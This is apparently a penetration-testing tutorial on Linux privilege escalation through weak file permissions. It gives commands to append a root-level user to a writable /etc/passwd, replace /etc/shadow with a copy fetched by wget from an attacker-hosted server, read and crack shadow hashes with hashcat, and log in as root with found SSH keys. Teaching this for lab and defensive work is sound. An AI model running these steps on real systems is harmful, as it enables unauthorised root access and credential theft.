Weak File Permissions
In Linux, file permissions are used to control who can access files and directories and what level of privileges users have on them. The most common file permission settings include read, write, and execute, which are assigned to three groups: owner, group, and others.
When file permissions are set incorrectly, it can allow unauthorized users or processes to access, modify, or execute files and directories.
Linux file and directory permissions are pretty simple. When you do ls -la on a directory, you’ll see the below:
| Permissions | Meaning |
|---|---|
| r | Read permission |
| w | Write permission |
| x | Execute permission |
| rwxrwxrwx | Meaning |
| First | Owner of the file (creator) |
| Second | Group owner ship of file |
| Third | Other users’ permission |
With the example above, file 1 is readable, writeable and executable by everyone. File 2 is readable, writeable and executable by the owner of the file who is “activepwn” but only readable by other users.
Full Walkthroughs
Writable /etc/passwd file
As a low privilege user, you can most likely read this file but if you have permissions to write to it, you can add a new user and give them root permissions.
For the scenarios below, we’ll have a low privileged shell as the “victim” user on an Ubuntu machine. Lets check if the file is writable
ls -la /etc/passwd
The output above shows us that “other users” have read, write and execute permissions on the file
Since its writable, we can try to add our own user to the passwd file and give them root permissions.
Before we add our custom user, we need to create a password for them. We can use openssl to generate a password.
openssl passwd "password"
After the password is generated, we can echo a new user into the /etc/passwd file
We need to echo this into the passwd file:
newroot:$1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/:0:0:root:/root:/bin/bash- newroot is the username we’re choosing
- $1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/ is the password we generated
- 0:0 is the user identifier and group identifier, respectively. We’re setting them both to 0 because it belongs to root
- root is who the “newroot” user will be logged in as
- /root is the home directory
- /bin/bash is the login shell that the “newroot” user will have
echo 'newroot:$1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/:0:0:root:/root:/bin/bash' >> /etc/passwd
Checking the /etc/passwd file, we can see that the “newroot” user has been added
tail -n 3 /etc/passwd
Lets try changing to the “newroot” user
/etc/shadow
If the /etc/shadow file is writable, we can change the root users’ password.
We can generate our new password using mkpasswd
mkpasswd -m sha-512 newpassword
Don’t modify the actual /etc/shadow file (this can be risky and difficult to do with unstable shells).
Instead, lets copy and paste the contents of the shadow file to a text editor in Kail and modify it there with our generated password.
cat /etc/shadow
Pasted and modified in Kali:
Now we can bring the altered shadow file over. Host a python webserver on Kali.
python3 -m http.server 80
Then we can use wget to bring the altered shadow file over
wget http://192.168.5.7/shadow shadow
Create a backup of the original /etc/shadow file
cp /etc/shadow shadow.tmp
Now we can replace the contents of the original shadow file with our own shadow files’ content
cat shadow > /etc/shadow
Note: The reason I didn’t just move the original file is because certain versions of Linux prevents you from completely deleting, moving or replacing the shadow file and this is a “creative” way of getting past that.
Checking the shadow file, we can see that the contents have changed.
Now log in with the credentials
After you’ve finished with the exploit, make sure to replace the altered shadow file with the backup you created
Cracking a shadow file (Read permissions)
Even if we don’t have write privileges to the /etc/shadow file, we can still read it and try to crack the password by reading it.
Lets copy the password hash and paste it to a file in Kali
We can try to crack this with hashcat. But before we do that we need to figure out what this hash is. Lets check this page:
Since the $6$ from the hash matches the example hash given on page, we can conclude that this is a sha512 hash.
From this, we know that we need to use mode 1800 for this hash
hashcat -m 1800 <hash_file> <wordlist>
After a little bit, we can see that the password got cracked.
Note: Since its SHA512, it can take a very long time to crack.
Insecure Backup
Check /root, /tmp, /var/backups directories
You can check /var/backups for the shadow.bak file. And if you have read permissions on that file, you might find credentials:
If you have read permissions on /root, you can check for ssh keys. If there is an SSH key, you can try to log in with it using:
ssh -i key_file root@192.168.0.1